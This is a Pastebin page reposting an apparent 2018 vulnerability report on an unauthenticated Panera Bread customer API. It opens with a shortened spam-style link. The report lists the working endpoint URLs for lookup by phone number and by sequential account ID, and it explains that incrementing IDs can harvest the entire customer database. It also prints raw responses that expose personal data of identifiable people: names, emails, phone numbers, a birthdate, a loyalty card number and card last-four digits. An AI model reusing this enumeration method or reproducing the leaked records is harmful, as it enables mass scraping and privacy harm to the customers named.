API tools faq
paste
Guest User

Untitled

a guest
Apr 3rd, 2018
91
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.57 KB | None | 0 0
raw download clone embed print report
  1. ***READ MORE FROM HERE**** : http://corneey.com/wUcbxq
  2.  
  3.  
  4. 7682200f0cd27a4f1a3c2301941d959aae7abf89136c38a4f1ded4d2bb7a67d7
  5.  
  6. I'd like to report a security vulnerability in Panera Bread's web application. There is a publicly available, completely unauthenticated API endpoint that allows anyone to access the following information about anyone who has ever signed up for an account to order food from Panera Bread:
  7.  
  8. 1. Username
  9.  
  10. 2. First and last name
  11.  
  12. 3. Email address
  13.  
  14. 4. Phone number
  15.  
  16. 5. Birthday
  17.  
  18. 6. Last four digits of saved credit card number
  19.  
  20. 7. Saved home address
  21.  
  22. 8. Social account integration information
  23.  
  24. 9. Saved user food preferences and dietary restrictions
  25.  
  26. Here are the API endpoints which you can use to verify this information:
  27.  
  28. 1. https://delivery.panerabread.com/foundation-api/users/by-phone/9140000000
  29.  
  30. This returns the following JSON:
  31.  
  32. {"accounts": [{"username":"denys","name":"romona ruiz","cardNumber":"********6515"},{"username":"mhmulcahy@hotmail.com","name":"Marie Mulcahy","cardNumber":"********5527"},{"username":"fenrny@msn.com","name":"F B","cardNumber":"********7921"},{"username":"sabooky1@yahoo.com","name":"C Davis","cardNumber":"********7108"},{"username":"jorgeialcalde","name":"Jorge Alcalde","cardNumber":"********6129"},{"username":"ktennister37@aol.com","name":"Kei Kino","cardNumber":"********6061"},{"username":"gettingbetter812@yahoo.com","name":"jan jones","cardNumber":"********8950"},{"username":"kennny","name":"kenny poteat","cardNumber":"********4412"},{"username":"angelo151","name":"angelo ianello","cardNumber":"********8386"},{"username":"dblaperch@aol.com","name":"Deborah LaPerch","cardNumber":"********5384"},{"username":"bagnoni1@optonline.net","name":"sadie bagnoni","cardNumber":"********5144"},{"username":"arsbreva@hotmail.com","name":"Marea needle","cardNumber":"********7488"},{"username":"contessa1234","name":"CONTESSA SLEDGE","cardNumber":"********6702"},{"username":"lindapam","name":"elizabeth forlenzo","cardNumber":"********7085"},{"username":"jue-95@hotmail.com","name":"juline G","cardNumber":"********4220"},{"username":"gleuanter","name":"Leo Zinder","cardNumber":"********9123"},{"username":"artlaura","name":"arthur hanson","cardNumber":"********8139"},{"username":"dlongua","name":"denise longua","cardNumber":"********0102"},{"username":"homestead19-86@msn.com","name":"Sandra Baglione","cardNumber":"********6851"},{"username":"kilsha22","name":"kicia fulchek","cardNumber":"********2654"}]}
  33.  
  34. Note that you can look up usernames/email addresses for Panera Bread accounts if you know the target's phone number. This returns the username/email address and last four digits of the saved credit card of every user who has ever signed up with that phone number.
  35.  
  36. 2. https://delivery.panerabread.com/foundation-api/users/uramp/7382194
  37.  
  38. This returns the following JSON:
  39.  
  40. {"customerId":7382194,"username":"abcascio@cox.net","firstName":"Anthony","lastName":"Cascio","loyalty":{"cardNumber":"603077990852"},"emails":[{"id":23860763,"emailAddress":"abcascio@cox.net","emailType":"Personal","isDefault":true,"isOpt":true,"isVerified":true}],"phones":[{"id":18295989,"phoneNumber":"7032662951","phoneType":"Residential","countryCode":"1","extension":null,"name":null,"isSmsOpt":false,"isCallOpt":false,"isDefault":true,"isValid":true,"smsPreferences":[{"programName":"Delivery","isOpt":false,"isOptPending":false}]}],"isSmsGlobalOpt":false,"isEmailGlobalOpt":true,"isMobilePushOpt":false,"birthDate":{"birthDay":"25","birthMonth":"05","birthYear":"1948"},"userPreferences":{"foodPreferences":[{"code":3,"displayName":"Low Fat"}],"gatherPreference":{"code":7,"displayName":"Meal with family"}},"subscriptions":{"subscriptions":[{"subscriptionCode":1,"displayName":"Reward Reminders & Expiration Alerts","isSubscribed":false,"tncVersion":null},{"subscriptionCode":2,"displayName":"Panera Bread Updates & Special Offers","isSubscribed":false,"tncVersion":null}],"suppressors":[{"suppressionCode":1,"displayName":"Catering","isSuppressed":false},{"suppressionCode":2,"displayName":"CPG","isSuppressed":false}]},"addresses":[],"paymentOptions":{"creditCards":[],"payPals":[],"giftCards":[],"corporateCateringAccounts":[]},"taxExemptions":null,"socialIntegration":null,"favoriteCafes":[]}
  41.  
  42. In this context, "7382194" is the user's account ID. Panera Bread uses sequential integers for account IDs, which means that if your goal is to gather as much information as you can instead about someone, you can simply increment through the accounts and collect as much as you'd like, up to and including the entire database.
  43.  
  44. Hopefully they'll fix this if it gets enough attention.
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!